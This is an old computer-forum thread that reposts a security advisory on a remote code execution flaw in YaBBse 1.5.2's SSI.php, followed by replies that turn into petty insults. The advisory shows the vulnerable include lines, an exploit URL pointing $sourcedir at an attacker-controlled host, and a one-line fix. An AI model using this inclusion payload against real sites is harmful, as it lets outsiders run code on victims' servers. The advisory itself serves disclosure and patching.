Go Back   Computer Forums > General Computing > Cyber Safety and Computer Security
Click Here to Login
Join Computer forums Today


Reply
 
Thread Tools Search this Thread Display Modes
 
Old 05-18-2003, 07:16 PM   #1
 
Join Date: May 2003
Posts: 56
Default Remote code execution in YaBBse 1.5.2 (php version)

Remote code execution in YaBBse 1.5.2 (php version)

======[ Overview
YaBB is widely used bulletin board system.




======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define $sourcedir variable through URL and include some other PHP script local or remote if remote inclusion is enabled in php.ini file ...
Bug in not exploitable if PHP's registar_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php...w.attacker.com



Attacker would place an Errors.php file on his server ... The code included would get executed on victim's server ...
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, rtny, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS
__________________

CourtneyDS is offline   Reply With Quote
Old 05-19-2003, 09:31 AM   #2
Fully Optimized
 
Slayer's Avatar
 
Join Date: Mar 2003
Posts: 3,111
Send a message via AIM to Slayer Send a message via MSN to Slayer Send a message via Yahoo to Slayer
Default

Just out of interest,who the heck is 'eltoro'?
__________________

Slayer is offline   Reply With Quote
Old 05-19-2003, 11:12 AM   #3
Site Team
 
David Lindon's Avatar
 
Join Date: Dec 2002
Posts: 15,233
Default

Thanks for the warning court.
__________________
[url=http://www.LNXPS.NET]LNXPS.NET - The XPS Library]
David Lindon is offline   Reply With Quote
Old 05-19-2003, 07:47 PM   #4
 
Join Date: May 2003
Posts: 56
Default

rocker_nash
Quote:
Just out of interest,who the heck is 'eltoro'?
^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and dont concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :
Quote:
Thanks for the warning court.

^^ Your more then welcome David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped-out in under 12 key strokes ?

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 06-02-2003, 07:59 PM   #5
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

damn, even i can do it up on yabb and mysql
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:18 PM   #6
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Dought it, there's patches out there and this is extremly old info.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:31 PM   #7
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:35 PM   #8
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:39 PM   #9
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
The day you understand that you can't bully me and your quite beneth me is the day you'll wake up.

All of this is wack including your responses, she give's out old redundat information ann you praise her. I think your the one that needs to learn something.
how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:42 PM   #10
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Can you speak english cause I really can't follow your "slang" .

What your saying doesn't make any sense, again!
__________________

__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT -5. The time now is 01:51 PM.


Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0